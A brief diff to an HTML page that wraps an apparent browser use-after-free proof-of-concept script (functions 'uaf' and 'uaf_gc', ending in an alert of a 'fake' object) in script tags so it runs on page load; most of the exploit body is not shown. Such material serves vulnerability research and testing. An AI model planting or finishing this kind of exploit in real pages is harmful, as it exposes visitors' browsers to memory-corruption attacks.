--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
+<script>
 function uaf(){
     function uaf_gc() {
         try {
@@ -59,3 +60,4 @@ function uaf(){
     var fake = a[1]
     alert(fake);
 }
+</script>
